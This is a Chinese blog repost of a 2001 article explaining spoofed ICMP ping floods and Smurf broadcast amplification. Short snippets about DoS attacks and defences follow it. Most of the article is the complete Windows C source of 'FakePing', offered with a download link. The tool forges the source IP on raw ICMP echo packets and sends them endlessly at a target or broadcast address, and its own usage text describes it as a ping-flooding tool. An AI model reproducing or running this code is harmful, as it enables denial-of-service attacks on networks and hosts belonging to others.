- 浏览: 178922 次
- 性别:
- 来自: 上海
文章分类
- 全部博客 (174)
- rails (25)
- js (15)
- ruby (30)
- webserver (5)
- mysql (13)
- security (5)
- thinking (5)
- common sense (2)
- linux (18)
- android (26)
- web browser (1)
- config and deploy (1)
- mac (5)
- css (2)
- db (8)
- version manager (1)
- editor (1)
- job (1)
- OOA (1)
- php (1)
- apache (2)
- mongrel (1)
- Mongodb (1)
- facebook (1)
- 架构 (1)
- 高并发 (1)
- twitter (1)
- Erlang (1)
- Scala (1)
- Lua (1)
- ubuntu (3)
- cache (1)
- 面试题 (2)
- android layout (2)
- android控件属性 (2)
- java (5)
- customize view (1)
- advanced (2)
- python (2)
- 机器学习 (5)
最新评论
最近不少人又来号召大家一起去Ping死什么什么网站,政治我不懂,不过从技术上来说,无论什么拒绝服务攻击方式,都需要满足一个条件:用最少的资源换取
被攻击者最大的消耗。像这样大家一起去Ping不仅是奇怪的:用最大的资源换取对方最小的伤害;也是可笑的:人民战争大概属于50多年前的行为了,在互联
网时代,并不是人多就能如何如何的。
一个基本的认识:互联网的中心在美国,中国的这一部分只不过是互联网的一个小小分支(也就是相当于美国的一个城域网的概念),我们通往北美的光缆称为“北
美出口”,出口什么意思?大门呀,换句话说,也就是瓶颈,这样大家Ping来Ping去,首先死的是中国的出口网关(中国的北美出口带宽也不过是GB级
的,很宽么?经得住大家一起往外挤么?),当然,北美出口歇掉了,我们显然是看不见美国网站了,喜欢做阿Q的不妨对自己和别人说:“美国被我们炸掉了!”
(奇怪吧?可是前些时候不是有自己炮制白宫“被黑”页面到处散发的?)可是这样不如我们关掉国门、断开互联网,自己在家里做强国梦好了,想象中我们仍然是
在强大的唐朝,世界各地都来朝拜。
闲话少说,我们今天是来说Ping的,Ping是通过发送ICMP报文(类型8代码0)探寻网络主机是否存在的一个工具,很久以前,一部分操作系统(例如
win95),不能很好处理过大的Ping包,导致出现了Ping to
Death的攻击方式(用大Ping包搞垮对方或者塞满网络),随着操作系统的升级,网络带宽的升级、计算机硬件的升级,目前,大Ping包基本上没有很
大的攻击效果(分布式攻击除外),如果一定要使用Ping包去攻击别的主机,除非是利用TCP/IP协议的其他特性或者网络拓扑结构的缺陷放大攻击的力度
(所谓正反馈)
正常情况下,Ping的流程是这样的:
主机A发送ICMP 8,0报文给主机B
主机B回送ICMp 0,0报文给主机A
因为ICMP基于无连结,所以就给了我们可乘之机,假设现在主机A伪装成主机C发送ICMP 8,0报文,结果会怎么样呢?显然,主机B会以为是主机C发送的报文而去
回应主机C,结构如下:
伪装为主机C 错误的回复
主机A--------------------->主机B------------------>主机C
这种情况下,由于主机A只需要不断发送Ping报文而不需要处理返回的EchoReply,所以攻击力度成倍的增加,同时实际上主机B和主机C都是被进攻的目标,而且
不会留下自己的痕迹,是一种隐蔽的一石二鸟的攻击方法。
上面的方法用SOCK_RAW伪装IP就可以轻松实现,不过即使放大了两倍,对于比较强壮的操作系统和较大的带宽,也不见得有多大的效果,难道我们又来组
织运动?不好吧,还是让敌人给我们放大好了,TCP/IP中有一个概念叫做广播,所谓广播的意思是说有一个地址,任何局域网内的主机都会接收发往这个地址
的报文(就像电台广播一样),要是?难道?没错!如果我们往广播地址发送一个ICMP
ECHO报文(就是Ping广播地址一下),结果会得到非常多的回应,以太网内每一个允许接收广播报文的主机都会回应一个ICMP_ECHOREPLY,
如果你想试验,可以在unix的机器上Ping一下你局域网的广播地址,会看到很多回应的的dup包,就是重复的应答,windows系统上不会有这样的
结果,因为微软的Ping程序不对多个回应进行解包,收到第一个包以后就丢弃后面的了,同样微软的系统默认也不回应广播地址的包,所以你最好在一个大量
unix主机的局域网内测试。
说到这里,聪明的你肯定知道我想干什么了吧?嘿嘿嘿嘿,没错,当我们伪装成被攻击主机向一个广播地址发送Ping请求的时候,所有这个广播地址内的主机都
会回应这个Ping请求(当然是回应给被攻击主机啦,人人都以为是它Ping的呢),这样,相当于是N倍的攻击力度!(N=广播地址内回应Ping包的主
机数量)
我写了一个FakePing的工具,可以在Http://www.patching.net/shotgun/FakePing.exe下载,使用方法是FakePing.exe FakeIP TargetIP
[PacketSize],如果TargetIP是广播地址,那么FakeIP是被攻击目标.
源码公布如下:(写的比较匆忙,代码比较乱,见笑了)
//////////////////////////////////////////////////////////////////////////
// //
// FakePing For Win2K by Shotgun //
// //
// Released: [2001.4] //
// Author: [Shotgun] //
// Homepage: //
// [http://IT.Xici.Net] //
// [http://WWW.Patching.Net] //
// //
//////////////////////////////////////////////////////////////////////////
#include <winsock2.h>
#include <Ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>
#define SEQ 0x28376839
#define STATUS_FAILED 0xFFFF //错误返回值
typedef struct _iphdr //定义IP首部
{
unsigned char h_verlen; //4位首部长度,4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;
//
// 定义ICMP首部
typedef struct _ihdr
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号
ULONG timestamp; //时间戳
}ICMP_HEADER;
//CheckSum:计算校验和的子函数
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1) {
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size ) {
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
//FakePing主函数
int main(int argc, char **argv)
{
int datasize,ErrorCode,counter,flag;
int TimeOut=2000, SendSEQ=0, PacketSize=32;
char SendBuf[65535]={0};
WSADATA wsaData;
SOCKET SockRaw=(SOCKET)NULL;
struct sockaddr_in DestAddr;
IP_HEADER ip_header;
ICMP_HEADER icmp_header;
char FakeSourceIp[20],DestIp[20];
//接受命令行参数
if (argc<3)
{
printf(\"FakePing by Shotgun\\n\");
printf(\"\\tThis program can do Ping-Flooding from a FakeIP\\n\");
printf(\"\\tUsing a BroadCast IP as the FakeIP will enhance the effect\\n\");
printf(\"Email:\\n\");
printf(\"\\tShotgun@Xici.Net\\n\");
printf(\"HomePage:\\n\");
printf(\"\\thttp://It.Xici.Net\\n\");
printf(\"\\thttp://www.Patching.Net\\n\");
printf(\"USAGE:\\n\\tFakePing.exe FakeSourceIp DestinationIp [PacketSize]\\n\");
printf(\"Example:\\n\");
printf(\"\\tFakePing.exe 192.168.15.23 192.168.15.255\\n\");
printf(\"\\tFakePing.exe 192.168.15.23 192.168.15.200 6400\\n\");
exit(0);
}
strcpy(FakeSourceIp,argv[1]);
strcpy(DestIp,argv[2]);
if (argc>3) PacketSize=atoi(argv[3]);
if (PacketSize>60000)
{
printf(\"Error! Packet size too big, must <60K\\n\");
exit(0);
}
printf(\"Now Fake %s Ping %s using Packet size=%d bytes\\n\",
FakeSourceIp, DestIp, PacketSize);
printf(\"\\tCtrl+C to Quit\\n\");
//初始化SOCK_RAW
if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0)
{
fprintf(stderr,\"WSAStartup failed: %d\\n\",ErrorCode);
ExitProcess(STATUS_FAILED);
}
if((SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET)
{
fprintf(stderr,\"WSASocket() failed: %d\\n\",WSAGetLastError());
ExitProcess(STATUS_FAILED);
}
flag=TRUE;
//设置IP_HDRINCL以自己填充IP首部
ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
if(ErrorCode==SOCKET_ERROR)
printf(\"Set IP_HDRINCL Error!\\n\");
__try{
//设置发送超时
ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
if (ErrorCode==SOCKET_ERROR)
{
fprintf(stderr,\"Failed to set send TimeOut: %d\\n\",WSAGetLastError());
__leave;
}
memset(&DestAddr,0,sizeof(DestAddr));
DestAddr.sin_family=AF_INET;
DestAddr.sin_addr.s_addr=inet_addr(DestIp);
//填充IP首部
ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位IP版本号,低四位首部长度
ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(ICMP_HEADER)); //16位总长度(字节)
ip_header.ident=1;
//16位标识
ip_header.frag_and_flags=0;
//3位标志位
ip_header.ttl=128;
//8位生存时间 TTL
ip_header.proto=IPPROTO_ICMP;
//8位协议 (TCP, UDP 或其他)
ip_header.checksum=0;
//16位IP首部校验和
ip_header.sourceIP=inet_addr(FakeSourceIp); //32
位源IP地址
ip_header.destIP=inet_addr(DestIp);
//32位目的IP地址
//填充ICMP首部
icmp_header.i_type = 8;
icmp_header.i_code = 0;
icmp_header.i_cksum = 0;
icmp_header.i_id = 2;
icmp_header.timestamp = 999;
icmp_header.i_seq=999;
memcpy(SendBuf, &icmp_header, sizeof(icmp_header));
memset(SendBuf+sizeof(icmp_header), ‘E‘, PacketSize);
icmp_header.i_cksum = checksum((USHORT *)SendBuf, sizeof(icmp_header)+PacketSize);
memcpy(SendBuf,&ip_header,sizeof(ip_header));
memcpy(SendBuf+sizeof(ip_header), &icmp_header, sizeof(icmp_header));
memset(SendBuf+sizeof(ip_header)+sizeof(icmp_header), ‘E‘, PacketSize);
memset(SendBuf+sizeof(ip_header)+sizeof(icmp_header)+PacketSize, 0, 1);
//计算发送缓冲区的大小
datasize=sizeof(ip_header)+sizeof(icmp_header)+PacketSize;
ip_header.checksum=checksum((USHORT *)SendBuf,datasize);
//填充发送缓冲区
memcpy(SendBuf,&ip_header, sizeof(ip_header));
while(1)
{
Sleep(100);
printf(\".\");
for(counter=0;counter<1024;counter++)
{
//发送ICMP报文
ErrorCode=sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*)&DestAddr,sizeof(DestAddr));
if (ErrorCode==SOCKET_ERROR) printf(\"\\nSend Error:%d\\n\",GetLastError());
}
}
}//End of try
__finally {
if (SockRaw != INVALID_SOCKET) closesocket(SockRaw);
WSACleanup();
}
return 0;
}
相关推荐
但是,课程设计还涉及到了洪水ping攻击的概念,这是一种向目标主机发送大量ICMP回显请求报文的攻击方式,即使无法造成系统崩溃,也能对目标造成资源消耗,导致性能下降,甚至服务不可用。 学生在设计攻击程序的过程...
例如,WFQ对付Ping Flood攻击要比防止SYNFlood攻击更有效。 5. RPF的应用:RPF可以检查路由器接口所接收的每一个数据包,并丢弃来自未知IP地址的数据包,防止Smurf攻击和其他基于IP地址欺骗的攻击。 6. TCP拦截的...
洪水攻击详解 ①注解:洪水攻击(FLOOD ATTACK)是指利用计算机网络技术向目标主机发送大量无用的数据报文,使得目标主机忙于处理无用的数据报文而无法提供正常服务的网络行为。 主要原理:利用了网络协议中...
死亡之ping ICMP洪水攻击 泪珠攻击的原理 泪珠攻击示意图 正常分片报文 第一片报文 第二片报文 组合后报文 IP头 UDP头 数据A 偏移量=0 IP头 UDP头 数据B IP头 UDP头 数据A 数据B 偏移量=1460 泪珠攻击分片报文 第一...
Ping 洪流攻击是一种早期的攻击方式,利用系统的自身漏洞实现。攻击者可以通过大量的ping请求来占满目标机器的带宽,导致目标机器停止提供服务。 三、攻击过程或步骤流程 攻击过程或步骤流程包括攻击使用的工具、...
死亡之PING是一种常见的网络攻击手段,攻击者通过发送大量的PING数据包来淹没目标网络或系统。地址猜测攻击是指攻击者通过猜测目标网络或系统的IP地址来进行攻击。泪滴攻击是一种常见的网络攻击手段,攻击者通过发送...
2. ICMP洪水攻击:发送大量ICMP回显请求(ping)给目标,使目标服务器的CPU和带宽资源耗尽。 3. UDP洪水攻击:发送大量UDP数据包到目标,造成网络拥塞。 DDoS攻击的危害包括:服务中断、经济损失、信誉损害以及对...
* Smurf 攻击(Smurf Attack):攻击者使用将回复地址设置成受害网络的广播地址的 ICMP 应答恳求(ping)数据包来沉没受害主机的方式进行。 * Fraggle 攻击(Fraggle Attack):攻击者使用的是 UDP 应答消息而非 ...
通过IP欺骗,攻击者可以发起DoS攻击(如Smurf攻击、SYN洪水攻击等),破坏网络服务或造成网络拥塞。IP欺骗还可以用于更复杂的攻击,如通过伪造数据包来破坏认证过程。 网络服务攻击主要针对服务器上运行的服务,...
STRIDE模型将威胁分为六类,其中DoS攻击指的是利用软件漏洞,如“Ping of Death”攻击中的空指针解引用,导致服务中断。 DDoS攻击与DoS的主要区别在于分布式特性。攻击来源可能是一个IP地址,一台物理机,甚至是多...
7. Ping Flood(Ping洪水):短时间内向目标主机发送大量ping包,造成网络堵塞或主机资源耗尽,影响服务的正常运行。 三、CISCO路由器防御DoS攻击的方法 1. 使用Unicast RPF功能:Unicast RPF(Unicast Reverse ...
ICMP洪水攻击是另一种DoS攻击方式,攻击者发送大量ICMP(Internet Control Message Protocol)请求报文,如ping请求,迫使靶机回应。这会占用靶机的CPU资源,导致服务响应变慢或完全中断。 实施步骤与SYN洪水类似,...
其中,Smurf攻击是一种利用ICMP回显请求(ping包)进行的洪水攻击,它通过欺骗源地址,使网络流量放大,受害者和广播网段都受到损害。 防御Smurf攻击的策略主要包括两个方面: 1. 防止成为攻击的帮凶: - 禁止IP...
资源消耗包括网络带宽、存储空间、CPU时间等,如通过ping、flooding、SYN flooding等方式。破坏或改变配置信息可能涉及修改服务用户群、删除口令文件等。此外,物理破坏和利用服务程序错误(如LAND攻击)也是常见...
2.ICMP Flood攻击 正常情况下,为了对网络进行诊断,一些诊断程序,比如Ping等,会发出ICMP请求报文(ICMP Request),计算机接收到ICMP请求后,会回应一个ICMP应答报文。而这个过程是需要CPU处理的,有的情况下还...
用于测试 ping IP 或使用最大大小泛洪 ping 的简单界面。 对于工作等场所很有用,当 2 人可以攻击一个人并取消他的网络访问时。
攻击者通常利用僵尸网络(由被感染的计算机组成)向目标发送大量的数据包,这些数据包可能包括SYN洪水、UDP洪水、ICMP洪水等,使得目标服务器的网络资源被大量占用,无法处理正常的服务请求。在这种情况下,不仅被...
实验步骤包括设置协议分析器的过滤条件,捕获洪水攻击的数据,以及通过不同类型的攻击模拟来观察目标主机的响应。这种实验有助于理解DoS和DDoS攻击的工作原理,以及如何检测和防御这些攻击。 总的来说,DoS和DDoS...